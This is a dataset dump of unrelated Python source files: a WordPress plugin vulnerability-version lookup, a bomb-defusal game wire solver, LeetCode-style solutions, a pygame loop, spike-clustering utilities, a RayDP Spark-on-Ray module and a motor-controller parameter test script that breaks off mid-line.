< parse_version(_fixed_in):\n self.log.info('{} is vulnerable. _curver: {} _fixed_in: {}'.format(_name, _curver, _fixed_in))\n return True\n else:\n self.log.info('{} is NOT vulnerable. _curver: {} _fixed_in: {}'.format(_name, _curver, _fixed_in))\n return False\n\n def themelookup(self):\n \"\"\"\n To be implemented\n :return: \n \"\"\"\n return\n\n def pullvulndata(self):\n \"\"\"\n we need to make sure that the response from wpvulndb is either a 200 or 404 when looking up vulns.\n If its anything else, its likely you've been blocked by their CDN firewall. \n \"\"\"\n try:\n count = 0\n self.r = requests.get(url=self.fullurl, verify=False)\n while self.r.status_code == 429 and count < 10:\n self.r = requests.get(url=self.fullurl, verify=False)\n count += 1\n from time import sleep\n sleep(5)\n if self.r.status_code != 200 and self.r.status_code != 404:\n print(self.r.status_code)\n print(self.r.content)\n if count == 10:\n self.log.critical('something is funky with wpvulndb. tried 10 times and Failed')\n except requests.HTTPError as E:\n self.log.error('Error somewhere in pullvulndata(). {}'.format(E))\n pass\n\n def fullvulnlookup(self):\n self.corelookup()\n self.pluginlookup()\n self.themelookup()\n return self.jsonout\n","sub_path":"libs/vulnlookup.py","file_name":"vulnlookup.py","file_ext":"py","file_size_in_byte":7724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"194998749","text":"#!/usr/bin/python3\n\nclass wireModule:\n #define intialization\n def __init__(self,color,wireCount,serialNumber):\n self.color = color\n self.wireCount = wireCount\n self.serialNumber = serialNumber\n #intialize colors to zero, will iterate through function later\n self.black = 0\n self.blue = 0\n self.red = 0\n self.white = 0\n self.yellow = 0\n #positions that wires appear in, yes those are arrays\n self.blackPos = [0] * wireCount\n self.bluePos = [0] * wireCount\n self.redPos = [0] * wireCount\n self.whitePos = [0] * wireCount\n self.yellowPos = [0] * wireCount\n \n #perform solution logic on UDT\n def solve(self):\n from color import colorlist\n #puts color string into array of characters then stores the number of and position of wires\n letter = list(self.color)\n i = 0\n while i < len(letter): \n if 'x' in letter[i]:\n self.black += 1\n self.blackPos[i] = 1\n elif 'b' in letter[i]:\n self.blue += 1\n self.bluePos[i] = 1\n elif 'r' in letter[i]:\n self.red += 1\n self.redPos[i] = 1\n elif 'w' in letter[i]:\n self.white += 1\n self.whitePos[i] = 1\n elif 'y' in letter[i]:\n self.yellow += 1\n self.yellowPos[i] = 1\n i += 1\n\n #solve for three wires\n if self.wireCount == 3:\n #if there are no red wires\n if self.red == 0:\n print(colorlist.RED + \"\\n*Cut the second wire!*\" + colorlist.END)\n #if the last wire is white\n elif self.whitePos[2] == 1:\n print(colorlist.RED + \"\\n*Cut the last wire!*\" + colorlist.END)\n #if there are more than one blue wire\n elif self.blue > 1:\n print(colorlist.RED + \"\\n*Cut the last blue wire!*\" + colorlist.END)\n #otherwise...\n else:\n print(colorlist.RED + \"\\n*Cut the last wire!*\" + colorlist.END)\n\n #solve for four wires\n if self.wireCount == 4:\n #if there is more than one red wire and the last digit of the serial number is odd\n if self.red > 1 and self.serialNumber == True:\n print(colorlist.RED + \"\\n*Cut the last red wire!*\" + colorlist.END)\n #if the last wire is yellow and there are no red wires\n elif self.red == 0 and self.yellowPos[3] == 1:\n print(colorlist.RED + \"\\n*Cut the first wire!*\" + colorlist.END)\n #if there is exactly one blue wire\n elif self.blue == 1:\n print(colorlist.RED + \"\\n*Cut the first wire!*\" + colorlist.END)\n #if there is more than one yellow wire\n elif self.yellow > 1:\n print(colorlist.RED + \"\\n*Cut the last wire!*\" + colorlist.END)\n #otherwise...\n else:\n print(colorlist.RED + \"\\n*Cut the second wire!*\" + colorlist.END)\n \n #for 5 wire modules\n if self.wireCount == 5:\n #if last wire is black and the last digit of the serial number is odd\n if self.blackPos[4] == 1 and self.serialNumber == True:\n print(colorlist.RED + \"\\n*Cut the fourth wire!*\" + colorlist.END)\n #if there is exactly one red wire and there is more than one yellow wire\n elif self.red == 1 and self.yellow > 1:\n print(colorlist.RED + \"\\n*Cut the first wire!*\" + colorlist.END)\n #if there are no black wires\n elif self.black == 0:\n print(colorlist.RED + \"\\n*Cut the second wire!*\"+ colorlist.END)\n #otherwise...\n else:\n print(colorlist.RED + \"\\n*Cut the first wire!*\" + colorlist.END)\n\n #for 6 wire modules\n if self.wireCount == 6:\n #if there are no yellow wires and the last digit of the serial number is odd\n if self.yellow == 0 and self.serialNumber == True:\n print(colorlist.RED + \"\\n*Cut the third wire!*\" + colorlist.END)\n #if there is exactly one yellow wire and there is more than one white wire\n elif self.yellow == 1 and self.white > 1:\n print(colorlist.RED + \"\\n*Cut the fourth wire!*\" + colorlist.END)\n #if there are no red wires\n elif self.red == 0:\n print(colorlist.RED + \"\\n*Cut the last wire!*\" + colorlist.END)\n #otherwise...\n else:\n print(colorlist.RED + \"\\n*Cut the fourth wire!*\" + colorlist.END)\n\n","sub_path":"simpleWires.py","file_name":"simpleWires.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"474655151","text":"__author__ = 'linweizhong'\n\"\"\"\nSum Root to Leaf Numbers\nGiven a binary tree containing digits from 0-9 only, each root-to-leaf path could represent a number.\n\nAn example is the root-to-leaf path 1->2->3 which represents the number 123.\n\nFind the total sum of all root-to-leaf numbers.\n\nFor example,\n\n 1\n / \\\n 2 3\nThe root-to-leaf path 1->2 represents the number 12.\nThe root-to-leaf path 1->3 represents the number 13.\n\nReturn the sum = 12 + 13 = 25.\n\n\n\n\"\"\"\n\nfrom node import *\nclass Solution:\n def __init__(self):\n self.result = 0\n\n def calleaf(self,root,prefix):\n if root == None : return\n if root.right == None and root.left == None :\n self.result = self.result + prefix * 10 + root.val\n return\n if root.right != None :\n self.calleaf(root.right,prefix *10 + root.val)\n if root.left != None :\n self.calleaf(root.left,prefix*10 + root.val)\n\n # @param root, a tree node\n # @return an integer\n def sumNumbers(self, root):\n if root == None : return self.result\n self.calleaf(root,self.result)\n return self.result\n\n\n","sub_path":"leetcode/sumNumbers.py","file_name":"sumNumbers.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"109540806","text":"'''Given an integral number, determine if it's a square number:\n\nIn mathematics, a square number or perfect square is an integer that is the square of an integer; in other words, it is the product of some integer with itself.\n\nThe tests will always use some integral number, so don't worry about that in dynamic typed languages.'''\n\ndef is_square(n): \n if n < 0: #This ensures negative numbers are not seen as squares\n return False\n else:\n if (n**0.5) == ((n**0.5)//1): # This tests whether the square root of n is an integer\n return True\n else:\n return False","sub_path":"Square.py","file_name":"Square.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"623002954","text":"import pygame\nfrom pygame.sprite import Group\n\nfrom settings import Settings\nfrom ship import Ship\nimport game_functions as gf\nfrom game_stats import GameStats\nfrom button import Button\n\ndef run_game():\n #Initialize pygame, settings and screen object\n pygame.init()\n ai_sets = Settings()\n screen = pygame.display.set_mode(\n (ai_sets.screen_width, ai_sets.screen_height))\n pygame.display.set_caption(\"Alien Invasion\")\n\n # Make the Play button.\n play_button = Button(ai_sets, screen, \"Play\")\n\n # Create an instance to store game statistics.\n stats = GameStats(ai_sets)\n\n # Make our ship\n ship = Ship(ai_sets, screen)\n\n # Make an alien\n aliens = Group()\n\n # Make a group to store bullets in.\n bullets = Group()\n \n # Create the fleet of aliens.\n gf.create_fleet(ai_sets, screen, ship, aliens)\n \n #start the main loop for the game\n while True:\n # Watch for keyboard and mouse events.\n gf.check_events(ai_sets, screen, stats, play_button, ship, bullets)\n if stats.game_active:\n \n ship.update()\n\n gf.update_bullets(ai_sets, screen, ship, aliens, bullets)\n gf.update_aliens(ai_sets, stats, screen, ship, aliens, bullets)\n\n # Redraw the screen and ship during each pass through loop\n # Make the most recently drawn screen visible.\n gf.update_screen(ai_sets, screen, stats, ship, aliens, bullets, play_button)\n \n\nrun_game()\n","sub_path":"alien_invasion/alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"570490785","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport glob\nfrom collections import Iterator\nfrom typing import Any, Dict, Iterable, List, NoReturn\n\nimport pandas as pd\nimport pyarrow as pa\nimport pyspark\nimport ray\nfrom pyspark.sql.session import SparkSession\n\nimport raydp.parallel.general_dataset as parallel_dataset\nfrom raydp.parallel import PandasDataset\nfrom raydp.utils import divide_blocks\nfrom .ray_cluster_master import RayClusterMaster, RAYDP_CP\nfrom .spark_cluster import SparkCluster\n\n\nclass RayCluster(SparkCluster):\n def __init__(self):\n super().__init__(None)\n self._app_master_bridge = None\n self._set_up_master(None, None)\n self._spark_session: SparkSession = None\n\n def _set_up_master(self, resources: Dict[str, float], kwargs: Dict[Any, Any]):\n # TODO: specify the app master resource\n self._app_master_bridge = RayClusterMaster()\n self._app_master_bridge.start_up()\n\n def _set_up_worker(self, resources: Dict[str, float], kwargs: Dict[str, str]):\n raise Exception(\"Unsupported operation\")\n\n def get_cluster_url(self) -> str:\n return self._app_master_bridge.get_master_url()\n\n def get_spark_session(self,\n app_name: str,\n num_executors: int,\n executor_cores: int,\n executor_memory: int,\n extra_conf: Dict[str, str] = None) -> SparkSession:\n if self._spark_session is not None:\n return self._spark_session\n\n if extra_conf is None:\n extra_conf = {}\n extra_conf[\"spark.executor.instances\"] = str(num_executors)\n extra_conf[\"spark.executor.cores\"] = str(executor_cores)\n extra_conf[\"spark.executor.memory\"] = str(executor_memory)\n extra_conf[\"spark.jars\"] = \",\".join(glob.glob(RAYDP_CP))\n spark_builder = SparkSession.builder\n for k, v in extra_conf.items():\n spark_builder.config(k, v)\n self._spark_session =\\\n spark_builder.appName(app_name).master(self.get_cluster_url()).getOrCreate()\n return self._spark_session\n\n def save_to_ray(self, df: pyspark.sql.DataFrame, num_shards: int) -> PandasDataset:\n # call java function from python\n df = df.repartition(num_shards)\n sql_context = df.sql_ctx\n jvm = sql_context.sparkSession.sparkContext._jvm\n jdf = df._jdf\n object_store_writer = jvm.org.apache.spark.sql.raydp.ObjectStoreWriter(jdf)\n records = object_store_writer.save()\n\n worker = ray.worker.global_worker\n\n blocks: List[ray.ObjectRef] = []\n block_sizes: List[int] = []\n for record in records:\n owner_address = record.ownerAddress()\n object_id = ray.ObjectID(record.objectId())\n num_records = record.numRecords()\n # Register the ownership of the ObjectRef\n worker.core_worker.deserialize_and_register_object_ref(\n object_id.binary(), ray.ObjectRef.nil(), owner_address)\n\n blocks.append(object_id)\n block_sizes.append(num_records)\n\n divided_blocks = divide_blocks(block_sizes, num_shards)\n record_batch_set: List[RecordBatch] = []\n for i in range(num_shards):\n indexes = divided_blocks[i]\n object_ids = [blocks[index] for index in indexes]\n record_batch_set.append(RecordBatch(object_ids))\n\n # TODO: we should specify the resource spec for each shard\n ds = parallel_dataset.from_iterators(generators=record_batch_set,\n name=\"spark_df\")\n\n def resolve_fn(it: \"Iterable[RecordBatch]\") -> \"Iterator[RecordBatch]\":\n for item in it:\n item.resolve()\n yield item\n return ds.transform(resolve_fn, \".RecordBatch#resolve()\").flatten().to_pandas(None)\n\n def stop(self):\n if self._spark_session is not None:\n self._spark_session.stop()\n self._spark_session = None\n\n if self._app_master_bridge is not None:\n self._app_master_bridge.stop()\n self._app_master_bridge = None\n\n\nclass RecordBatch:\n def __init__(self, object_ids: List[ray.ObjectRef]):\n self._object_ids: List[ray.ObjectRef] = object_ids\n self._resolved: bool = False\n\n def _fetch_objects_without_deserialization(self, object_ids, timeout=None) -> NoReturn:\n \"\"\"\n This is just fetch object from remote object store to local and without deserialization.\n :param object_ids: Object ID of the object to get or a list of object IDs to\n get.\n :param timeout (Optional[float]): The maximum amount of time in seconds to\n wait before returning.\n \"\"\"\n is_individual_id = isinstance(object_ids, ray.ObjectID)\n if is_individual_id:\n object_ids = [object_ids]\n\n if not isinstance(object_ids, list):\n raise ValueError(\"'object_ids' must either be an object ID \"\n \"or a list of object IDs.\")\n\n worker = ray.worker.global_worker\n worker.check_connected()\n timeout_ms = int(timeout * 1000) if timeout else -1\n worker.core_worker.get_objects(object_ids, worker.current_task_id, timeout_ms)\n\n def resolve(self):\n if self._resolved:\n return\n self._fetch_objects_without_deserialization(self._object_ids)\n self._resolved = True\n\n def __iter__(self) -> \"Iterator[pd.DataFrame]\":\n for i in range(len(self._object_ids)):\n object_id = self._object_ids[i]\n assert object_id is not None\n data = ray.get(object_id)\n reader = pa.ipc.open_stream(data)\n tb = reader.read_all()\n df: pd.DataFrame = tb.to_pandas()\n yield df\n","sub_path":"python/raydp/spark/ray_cluster.py","file_name":"ray_cluster.py","file_ext":"py","file_size_in_byte":6612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"520836042","text":"# Uses python3\n# Finds the least common multiple of two numbers.\n# For example, given 6 and 8, the LCM is 24. This is\n# done by calculating the GCD of a and b, then taking\n# a*b/GCD. \ndef lcm(a, b):\n tempa = max(a,b)\n tempb = min(a,b)\n while tempb != 0:\n new_a = tempa%tempb\n tempa = tempb\n tempb = new_a\n\n lcm = (a*b/tempa)\n return lcm\n\na, b = [int(i) for i in input().split()]\nprint(lcm(a, b))\n\n\n","sub_path":"python/lcm.py","file_name":"lcm.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"38148143","text":"from scripts.systems.AaveSystem import AaveSystem\nfrom scripts.systems.YearnSystem import YearnSystem\nfrom scripts.systems.TokenSystem import TokenSystem\n\nclass ChainRegistry:\n def __init__(self, \n curve=None,\n uniswap=None,\n open_zeppelin=None,\n aragon=None,\n sushiswap=None,\n sushi=None,\n gnosis_safe=None,\n onesplit=None,\n pickle=None,\n harvest=None,\n tokens=None,\n whales=None,\n multicall=None,\n pancake=None,\n badger=None,\n yearn=None,\n aave=None,\n compound=None,\n ):\n self.curve=curve\n self.uniswap=uniswap\n self.open_zeppelin=open_zeppelin\n self.aragon=aragon\n self.sushiswap=sushiswap\n self.sushi=sushi\n self.gnosis_safe=gnosis_safe\n self.onesplit=onesplit\n self.pickle=pickle\n self.harvest=harvest\n self.tokens=tokens\n self.whales=whales\n self.multicall=multicall\n self.pancake=pancake\n self.badger=badger\n self.yearn=yearn\n self.aave=aave\n self.compound=compound\n \n def yearn_system(self) -> YearnSystem:\n if self.yearn == None:\n raise Exception(\"No yearn system registered\")\n return YearnSystem(self)\n\n def token_system(self) -> TokenSystem:\n if self.tokens == None:\n raise Exception(\"No yearn system registered\")\n return TokenSystem(self)\n\n def aave_system(self) -> AaveSystem:\n if self.aave == None:\n raise Exception(\"No aave system registered\")\n return AaveSystem(self)","sub_path":"helpers/registry/ChainRegistry.py","file_name":"ChainRegistry.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"129355749","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Clustering utility functions.\"\"\"\n\n#------------------------------------------------------------------------------\n# Imports\n#------------------------------------------------------------------------------\n\nimport numpy as np\n\nfrom ...utils.array import _as_array\nfrom ...utils._misc import Bunch\n\n\n#------------------------------------------------------------------------------\n# Utility functions\n#------------------------------------------------------------------------------\n\ndef _unique(x):\n \"\"\"Faster version of np.unique().\n\n This version is restricted to 1D arrays of non-negative integers.\n\n It is only faster if len(x) >> len(unique(x)).\n\n \"\"\"\n if len(x) == 0:\n return np.array([], dtype=np.int64)\n return np.nonzero(np.bincount(x))[0]\n\n\ndef _spikes_in_clusters(spike_clusters, clusters):\n \"\"\"Return the ids of all spikes belonging to the specified clusters.\"\"\"\n if len(spike_clusters) == 0 or len(clusters) == 0:\n return np.array([], dtype=np.int)\n return np.nonzero(np.in1d(spike_clusters, clusters))[0]\n\n\ndef _spikes_per_cluster(spike_ids, spike_clusters):\n \"\"\"Return a dictionary {cluster: list_of_spikes}.\"\"\"\n rel_spikes = np.argsort(spike_clusters)\n abs_spikes = spike_ids[rel_spikes]\n spike_clusters = spike_clusters[rel_spikes]\n\n diff = np.empty_like(spike_clusters)\n diff[0] = 1\n diff[1:] = np.diff(spike_clusters)\n\n idx = np.nonzero(diff > 0)[0]\n clusters = spike_clusters[idx]\n\n spikes_in_clusters = {clusters[i]: np.sort(abs_spikes[idx[i]:idx[i+1]])\n for i in range(len(clusters) - 1)}\n spikes_in_clusters[clusters[-1]] = np.sort(abs_spikes[idx[-1]:])\n\n return spikes_in_clusters\n\n\ndef _flatten_spikes_per_cluster(spikes_per_cluster):\n \"\"\"Convert a dictionary {cluster: list_of_spikes} to a\n spike_clusters array.\"\"\"\n clusters = sorted(spikes_per_cluster)\n clusters_arr = np.concatenate([(cluster *\n np.ones(len(spikes_per_cluster[cluster])))\n for cluster in clusters]).astype(np.int64)\n spikes_arr = np.concatenate([spikes_per_cluster[cluster]\n for cluster in clusters])\n spike_clusters = np.vstack((spikes_arr, clusters_arr))\n ind = np.argsort(spike_clusters[0, :])\n return spike_clusters[1, ind]\n\n\ndef _concatenate_per_cluster_arrays(spikes_per_cluster, arrays):\n \"\"\"Concatenate arrays from a {cluster: array} dictionary.\"\"\"\n # out = []\n assert set(arrays) <= set(spikes_per_cluster)\n clusters = sorted(arrays)\n # Check the sizes of the spikes per cluster and the arrays.\n n_0 = [len(spikes_per_cluster[cluster]) for cluster in clusters]\n n_1 = [len(arrays[cluster]) for cluster in clusters]\n assert n_0 == n_1\n\n # Concatenate all spikes to find the right insertion order.\n spikes = np.concatenate([spikes_per_cluster[cluster]\n for cluster in clusters])\n idx = np.argsort(spikes)\n # NOTE: concatenate all arrays along the first axis, because we assume\n # that the first axis represents the spikes.\n arrays = np.concatenate([_as_array(arrays[cluster])\n for cluster in clusters])\n return arrays[idx, ...]\n\n\n#------------------------------------------------------------------------------\n# UpdateInfo class\n#------------------------------------------------------------------------------\n\ndef update_info(**kwargs):\n \"\"\"Hold information about clustering changes.\"\"\"\n d = dict(\n description=None, # information about the update: 'merge', 'assign',\n # or 'metadata_'\n history=None, # None, 'undo', or 'redo'\n spikes=[], # all spikes affected by the update\n added=[], # new clusters\n deleted=[], # deleted clusters\n descendants=[], # pairs of (old_cluster, new_cluster)\n metadata_changed=[], # clusters with changed metadata\n old_spikes_per_cluster={}, # only for the affected clusters\n new_spikes_per_cluster={}, # only for the affected clusters\n )\n d.update(kwargs)\n return Bunch(d)\n\n\nUpdateInfo = update_info\n","sub_path":"phy/cluster/manual/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"123222634","text":"'''\nTest TMCL Parameters of TMCM1270 via CAN interface and module ID 1.\n\nCreated on 15.12.2020\n\n@author: LK\n'''\n\nfrom PyTrinamicMicro.platforms.motionpy.connections.can_tmcl_interface import can_tmcl_interface\nfrom PyTrinamic.modules.TMCM1270.TMCM_1270 import TMCM_1270\nimport logging\n\nMODULE_ID = 1\nGP_BANK = 0\nAP_AXIS = 0\n\nlogger = logging.getLogger(__name__)\nlogger.info(\"Test module TMCM1270 parameters via CAN\")\n\nlogger.info(\"Initializing interface.\")\ninterface = can_tmcl_interface(module_id=MODULE_ID)\n\nlogger.info(\"Initializing module.\")\nmodule = TMCM_1161(interface)\n\nlogger.info(\"Testing global parameter access.\")\n\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"CANBitrate\", module.GPs.CANBitrate))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.CANBitrate, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"CANSendId\", module.GPs.CANSendId))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.CANSendId, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"CANReceiveId\", module.GPs.CANReceiveId))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.CANReceiveId, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"CANSecondaryId\", module.GPs.CANSecondaryId))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.CANSecondaryId, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"autoStartMode\", module.GPs.autoStartMode))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.autoStartMode, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"protectionMode\", module.GPs.protectionMode))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.protectionMode, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"eepromCoordinateStore\", module.GPs.eepromCoordinateStore))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.eepromCoordinateStore, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"zeroUserVariables\", module.GPs.zeroUserVariables))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.zeroUserVariables, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"applicationStatus\", module.GPs.applicationStatus))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.applicationStatus, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"programCounter\", module.GPs.programCounter))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.programCounter, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"lastTmclError\", module.GPs.lastTmclError))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.lastTmclError, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"tickTimer\", module.GPs.tickTimer))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.tickTimer, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"randomNumber\", module.GPs.randomNumber))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.randomNumber, GP_BANK)))\n\nlogger.info(\"Testing axis parameter access.\")\n\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"TargetPosition\", module.APs.TargetPosition))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.TargetPosition, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ActualPosition\", module.APs.ActualPosition))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ActualPosition, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"TargetVelocity\", module.APs.TargetVelocity))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.TargetVelocity, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ActualVelocity\", module.APs.ActualVelocity))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ActualVelocity, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"MaxVelocity\", module.APs.MaxVelocity))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.MaxVelocity, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"MaxAcceleration\", module.APs.MaxAcceleration))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.MaxAcceleration, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"MaxCurrent\", module.APs.MaxCurrent))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.MaxCurrent, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"StandbyCurrent\", module.APs.StandbyCurrent))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.StandbyCurrent, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PositionReachedFlag\", module.APs.PositionReachedFlag))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PositionReachedFlag, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"HomeSwitch\", module.APs.HomeSwitch))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.HomeSwitch, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"RightEndstop\", module.APs.RightEndstop))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.RightEndstop, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"LeftEndstop\", module.APs.LeftEndstop))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.LeftEndstop, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"AutomaticRightStop\", module.APs.AutomaticRightStop))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.AutomaticRightStop, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"AutomaticLeftStop\", module.APs.AutomaticLeftStop))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.AutomaticLeftStop, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"swapSwitchInputs\", module.APs.swapSwitchInputs))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.swapSwitchInputs, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"A1\", module.APs.A1))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.A1, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"V1\", module.APs.V1))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.V1, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"MaxDeceleration\", module.APs.MaxDeceleration))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.MaxDeceleration, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"D1\", module.APs.D1))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.D1, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"StartVelocity\", module.APs.StartVelocity))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.StartVelocity, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"StopVelocity\", module.APs.StopVelocity))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.StopVelocity, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"RampWaitTime\", module.APs.RampWaitTime))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.RampWaitTime, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"THIGH\", module.APs.THIGH))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.THIGH, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"VDCMIN\", module.APs.VDCMIN))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.VDCMIN, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"rightSwitchPolarity\", module.APs.rightSwitchPolarity))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.rightSwitchPolarity, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"leftSwitchPolarity\", module.APs.leftSwitchPolarity))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.leftSwitchPolarity, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"softstop\", module.APs.softstop))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.softstop, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"HighSpeedChopperMode\", module.APs.HighSpeedChopperMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.HighSpeedChopperMode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"HighSpeedFullstepMode\", module.APs.HighSpeedFullstepMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.HighSpeedFullstepMode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"MeasuredSpeed\", module.APs.MeasuredSpeed))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.MeasuredSpeed, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PowerDownRamp\", module.APs.PowerDownRamp))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PowerDownRamp, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"RelativePositioningOptionCode\", module.APs.RelativePositioningOptionCode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.RelativePositioningOptionCode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"MicrostepResolution\", module.APs.MicrostepResolution))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.MicrostepResolution, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ChopperBlankTime\", 